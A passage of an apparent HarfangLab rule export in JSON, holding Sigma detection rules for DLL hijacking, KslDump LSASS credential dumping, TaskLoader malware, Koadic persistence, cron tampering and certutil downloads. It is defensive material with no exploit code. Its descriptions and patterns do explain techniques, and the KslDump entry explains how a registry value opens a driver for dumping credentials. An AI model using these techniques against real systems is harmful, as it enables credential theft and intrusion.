"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winlogon.yml",
"content": "title: DLL Hijacking via winlogon.exe\nid: 2312ad6d-35cc-45d7-83a7-08f4131d32b0\ndescription: |\n Detects potential Windows DLL Hijacking via winlogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'winlogon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\UXINIT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2312ad6d-35cc-45d7-83a7-08f4131d32b0",
"rule_name": "DLL Hijacking via winlogon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via winlogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2319811a-6bed-4f5b-988c-74630cf93daf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T16:07:52.726835Z",
"creation_date": "2026-03-23T11:45:34.623641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623645Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/andreisss/KslDump",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_ksldump.yml",
"content": "title: KslDump Technique Detected\nid: 2319811a-6bed-4f5b-988c-74630cf93daf\ndescription: |\n Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\n KslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\n The attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys (drivers\\KslD.sys) that Microsoft left on disk.\n KslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\n The only gate to the device handle is a process name string stored in a registry key (AllowedProcessName).\n It is recommended to check the process that modified the registry value and the details for suspicious activities.\nreferences:\n - https://github.com/andreisss/KslDump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2026/03/18\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\KslD\\AllowedProcessName'\n\n filter_legit_defender:\n Details:\n - '\\Device\\HarddiskVolume*\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '\\Device\\HarddiskVolume*\\Program Files\\Windows Defender\\MsMpEng.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2319811a-6bed-4f5b-988c-74630cf93daf",
"rule_name": "KslDump Technique Detected",
"rule_description": "Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\nKslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\nThe attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys (drivers\\KslD.sys) that Microsoft left on disk.\nKslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\nThe only gate to the device handle is a process name string stored in a registry key (AllowedProcessName).\nIt is recommended to check the process that modified the registry value and the details for suspicious activities.\n",
"rule_creation_date": "2026-03-18",
"rule_modified_date": "2026-03-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "233bd602-6fe8-4484-991f-3b45ef546127",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604263Z",
"creation_date": "2026-03-23T11:45:34.604266Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604274Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.file.net/process/sitool.exe.html",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_sitool_malware.yml",
"content": "title: TaskLoader Malware Execution\nid: 233bd602-6fe8-4484-991f-3b45ef546127\ndescription: |\n Detects the execution of the TaskLoader malware.\n TaskLoader is a malware that usually spreads through cracked software and contacts its C2 server for remote command execution.\n It is named TaskLoader as it utilizes scheduled tasks for persistence.\n The Sitool binary has also been associated with different malwares such as njRAT or Sabsik.\n It is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\nreferences:\n - https://www.file.net/process/sitool.exe.html\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/06/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.TaskLoader\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'sihost.exe'\n Image|endswith: '\\sitool.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "233bd602-6fe8-4484-991f-3b45ef546127",
"rule_name": "TaskLoader Malware Execution",
"rule_description": "Detects the execution of the TaskLoader malware.\nTaskLoader is a malware that usually spreads through cracked software and contacts its C2 server for remote command execution.\nIt is named TaskLoader as it utilizes scheduled tasks for persistence.\nThe Sitool binary has also been associated with different malwares such as njRAT or Sabsik.\nIt is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\n",
"rule_creation_date": "2023-06-16",
"rule_modified_date": "2025-03-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23401fcc-11a5-4f33-b901-caca2fc67071",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617355Z",
"creation_date": "2026-03-23T11:45:34.617357Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617361Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md",
"https://attack.mitre.org/techniques/T1053/003/"
],
"name": "t1053_003_cron_file_macos.yml",
"content": "title: Crontab-Related Files Read (macOS)\nid: 23401fcc-11a5-4f33-b901-caca2fc67071\ndescription: |\n Detects the access to a cron job files without the use of crontab.\n An attacker could add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/bin/cat'\n - '/bin/echo'\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/less'\n - '/usr/bin/more'\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n\n CommandLine|contains:\n # Match /etc/crontab and /etc/cron.daily and so on\n - '/etc/cron'\n # Alternative way to execute cron jobs via periodic\n - '/etc/periodic'\n - '/private/var/at'\n # symlink to /private/var/at\n - '/usr/lib/cron'\n\n exclusion_crontab_parent:\n ParentImage: '/usr/bin/crontab'\n\n # /bin/sh /etc/periodic/daily/199.clean-fax\n # /bin/sh - /etc/periodic/weekly/999.local\n # sh -c /etc/periodic/daily/999.local\n exclusion_periodic_exec:\n CommandLine|startswith:\n - '/bin/sh /etc/periodic'\n - '/bin/sh - /etc/periodic'\n - 'sh -c /etc/periodic'\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23401fcc-11a5-4f33-b901-caca2fc67071",
"rule_name": "Crontab-Related Files Read (macOS)",
"rule_description": "Detects the access to a cron job files without the use of crontab.\nAn attacker could add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-01-30",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1053.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23739d71-74b5-47ee-81b8-7aa4d21af3bc",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294721Z",
"creation_date": "2026-03-23T11:45:35.294724Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294729Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1036/004/",
"https://attack.mitre.org/techniques/T1036/005/",
"https://attack.mitre.org/techniques/T1569/"
],
"name": "t1036_004_systemd_service_manually_started.yml",
"content": "title: System Service Manually Started\nid: 23739d71-74b5-47ee-81b8-7aa4d21af3bc\ndescription: |\n Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\n This might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\n It is recommended to check if the binary is expected to be executed that way.\nreferences:\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n ParentImage|contains: '?'\n\n filter_forks:\n ParentImage|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n\n filter_systemd:\n - ParentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n - GrandparentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n\n exclusion_ossec:\n ParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_insights_client:\n CommandLine: '/usr/sbin/sshd -T'\n GrandparentCommandLine|startswith:\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n\n exclusion_sshd_basic_args_1:\n Image|endswith: '/sshd'\n CommandLine|contains:\n - ' -t '\n - ' -h '\n - ' -v '\n\n exclusion_sshd_basic_args_2:\n Image|endswith: '/sshd'\n CommandLine|endswith:\n - ' -t'\n - ' -h'\n - ' -v'\n - ' -?'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_s6_supervise:\n ProcessParentImage|endswith:\n - '/s6-supervise'\n - '/s6-svscan '\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_supervisord:\n ProcessParentCommandLine|contains: '/usr/bin/supervisord'\n\n exclusion_init:\n - ProcessParentCommandLine|contains: '/etc/init.d/'\n - ProcessGrandparentCommandLine|contains: '/sbin/init splash'\n - ProcessParentImage: '/sbin/init'\n - ProcessGrandparentImage: '/sbin/init'\n - ProcessParentCommandLine: '/sbin/init'\n - ProcessGrandparentCommandLine: '/sbin/init'\n\n exclusion_containerd:\n - ProcessAncestors|contains: '/containerd-shim-runc-v2'\n - ProcessGrandparentImage: '/sbin/docker-init'\n\n exclusion_runsvdir:\n - ProcessParentCommandLine|contains: 'runsvdir'\n - ProcessParentCommandLine|contains: 'runsvdir'\n\n exclusion_cups_snap:\n ProcessParentCommandLine: '/bin/sh /snap/cups/*/scripts/run-cupsd'\n\n exclusion_busybox:\n ProcessParentImage: '/bin/busybox'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23739d71-74b5-47ee-81b8-7aa4d21af3bc",
"rule_name": "System Service Manually Started",
"rule_description": "Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\nThis might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\nIt is recommended to check if the binary is expected to be executed that way.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1036.004",
"attack.t1036.005",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23ae76e3-7f36-4f3d-986c-cd449deeb266",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091265Z",
"creation_date": "2026-03-23T11:45:34.091267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091271Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/software/S0250/",
"https://attack.mitre.org/techniques/T1547/"
],
"name": "t1547_koadic_script_auto_run.yml",
"content": "title: Koadic Auto Run Script Created\nid: 23ae76e3-7f36-4f3d-986c-cd449deeb266\ndescription: |\n Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\n Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n It is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2021/02/11\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1547\n - attack.s0250\n - classification.Windows.Source.Filesystem\n - classification.Windows.Framework.Koadic\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\AppData\\Roaming\\\\??????????.hta'\n - '\\ProgramData\\\\??????????.hta'\n\n condition: selection\nlevel: medium\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23ae76e3-7f36-4f3d-986c-cd449deeb266",
"rule_name": "Koadic Auto Run Script Created",
"rule_description": "Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\nKoadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nIt is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\n",
"rule_creation_date": "2021-02-11",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1547"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23c070c2-f80e-42b8-a453-5cda9de44edb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098949Z",
"creation_date": "2026-03-23T11:45:34.098951Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098961Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lockscreencontentserver.yml",
"content": "title: DLL Hijacking via lockscreencontentserver.exe\nid: 23c070c2-f80e-42b8-a453-5cda9de44edb\ndescription: |\n Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lockscreencontentserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\dwmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23c070c2-f80e-42b8-a453-5cda9de44edb",
"rule_name": "DLL Hijacking via lockscreencontentserver.exe",
"rule_description": "Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073715Z",
"creation_date": "2026-03-23T11:45:34.073717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073721Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_certutil_download_usage.yml",
"content": "title: File Downloaded via Certutil\nid: 23c4819b-cfa3-4862-a35c-8735c0ec96a4\ndescription: |\n Detects usage of certutil.exe to download a file from a given URL.\n Adversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\n It is recommended to analyze the parent process and to downloaded file to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/05/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1105\n - attack.s0160\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_common_1:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_common_2:\n CommandLine|contains:\n - ' -split '\n - ' /split '\n\n selection_common_3:\n CommandLine|contains:\n - ' -f '\n - ' /f '\n\n selection_variant_urlcache:\n CommandLine|contains:\n - ' -urlcache '\n - ' /urlcache '\n\n selection_variant_verifyctl:\n CommandLine|contains:\n - ' -verifyctl '\n - ' /verifyctl '\n\n condition: all of selection_common_* and 1 of selection_variant_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4",
"rule_name": "File Downloaded via Certutil",
"rule_description": "Detects usage of certutil.exe to download a file from a given URL.\nAdversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\nIt is recommended to analyze the parent process and to downloaded file to look for malicious content or actions.\n",
"rule_creation_date": "2021-05-26",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072727Z",
"creation_date": "2026-03-23T11:45:34.072730Z",
"enabled": true,
"hl_status": "stable",
